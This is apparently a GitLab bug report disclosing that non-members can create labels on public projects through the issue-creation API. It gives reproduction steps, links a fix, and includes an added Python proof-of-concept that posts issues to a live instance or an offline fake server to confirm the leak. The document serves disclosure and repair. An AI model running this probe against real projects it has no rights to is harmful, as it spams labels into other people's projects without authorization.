Non-members can create labels through API's Issuable creation end-points
Summary
It appears that any user who can read a project is allowed to create labels on it through either of the API's issuable creation endpoints (quite possibly the update endpoints as well).
I encountered this bug while working on !6701 (closed)
Steps to reproduce
- Authenticate with the API using any user's private token (a user who is not a member of the target public project).
- Attempt to read issues on the public project (GET /projects/:id/issues). This works as expected.
- Create an issue (POST /projects/:id/issues), specifying labels as a comma-separated list.
- The API response contains the new issue without any labels.
- However, listing the project's labels (GET /projects/:id/labels) now shows the new labels specified in the POST.
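The steps above as a small reproduction script. This is an added example, not the reporter's own code or anything from GitLab: it assumes the API paths named in the steps under whatever base URL you pass (for example https://gitlab.com/api/v3), the PRIVATE-TOKEN header, and the usual 200/201 status codes. The built-in fake server is constructed here to mimic the reported behaviour so the script can also be run offline; point it at a real instance with the GITLAB_URL, GITLAB_TOKEN and GITLAB_PROJECT environment variables.

```python
"""Probe whether issue creation leaks labels into a project.

Added example, not the reporter's script. Assumes /projects/:id/issues and
/projects/:id/labels under the base URL and a PRIVATE-TOKEN header.
"""
import json
import os
import urllib.error
import urllib.request
from urllib.parse import urlencode


def http_json(method, url, token, data=None):
    """Default transport: one form-encoded request authenticated by token.

    Returns (status, decoded JSON body). HTTP errors are returned rather than
    raised, because the interesting case is a 201 whose label list is empty.
    """
    body = urlencode(data).encode() if data else None
    req = urllib.request.Request(url, data=body, method=method)
    req.add_header("PRIVATE-TOKEN", token)
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        return err.code, json.loads(err.read() or b"null")


def project_labels(base, project_id, token, transport=http_json):
    """Names currently listed by GET /projects/:id/labels."""
    status, body = transport("GET", f"{base}/projects/{project_id}/labels", token)
    if status != 200:
        raise RuntimeError(f"listing labels failed with HTTP {status}")
    return {label["name"] for label in body}


def probe_label_leak(base, project_id, token, labels, transport=http_json):
    """Run the reproduction steps and report which label names leaked.

    `labels` are the names a non-member should not be able to create.
    Returns the issue's own label list (expected empty for a non-member)
    and the requested names that newly appeared on the project afterwards.
    """
    before = project_labels(base, project_id, token, transport)
    status, issue = transport(
        "POST",
        f"{base}/projects/{project_id}/issues",
        token,
        {"title": "label leak probe", "labels": ",".join(labels)},
    )
    if status != 201:
        raise RuntimeError(f"issue creation failed with HTTP {status}: {issue}")
    after = project_labels(base, project_id, token, transport)
    return {
        "issue_labels": list(issue.get("labels", [])),
        "leaked": sorted((after - before) & set(labels)),
    }


def fake_buggy_gitlab(existing_labels):
    """Constructed stand-in for the vulnerable server, for offline runs.

    POST /issues answers 201 with an empty label list, yet the requested
    names are added to the project's label set, as reported.
    """
    labels = set(existing_labels)

    def transport(method, url, token, data=None):
        if method == "GET" and url.endswith("/labels"):
            return 200, [{"name": name} for name in sorted(labels)]
        if method == "POST" and url.endswith("/issues"):
            labels.update(n for n in data["labels"].split(",") if n)
            return 201, {"id": 1, "title": data["title"], "labels": []}
        return 404, {"message": "404 Not Found"}

    return transport


if __name__ == "__main__":
    base = os.environ.get("GITLAB_URL")  # e.g. https://gitlab.com/api/v3
    if base:
        transport = http_json
        project, token = os.environ["GITLAB_PROJECT"], os.environ["GITLAB_TOKEN"]
    else:
        transport = fake_buggy_gitlab({"bug", "enhancement"})
        base, project, token = "http://gitlab.test/api/v3", "1", "dummy-token"
    print(json.dumps(probe_label_leak(base, project, token,
                                      ["spam-1", "spam-2"], transport), indent=2))
```

Against an instance with the bug, `leaked` lists the names that now exist on the project even though `issue_labels` is empty; on a fixed instance both should be empty, or the POST should be rejected outright.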
I've replicated this on gitlab.com, and on the latest master branch.
https://gitlab.com/harigopal/geektrust-lengaburu/labels
I created those labels by calling the Issue endpoint from a new account that doesn't have any special access to the repo.
Related issue: harigopal/geektrust-lengaburu#1
The labels didn't get assigned to the issue, but they were created nonetheless. I think it'll be possible to spam any number of labels into a project this way.
Expected behavior
The labels suggested by the non-member should not be created.
Actual behavior
The labels are created.
Possible fixes
https://gitlab.com/harigopal/gitlab-ce/commits/labels-api-bug
I've included a spec for the bug and a possible fix.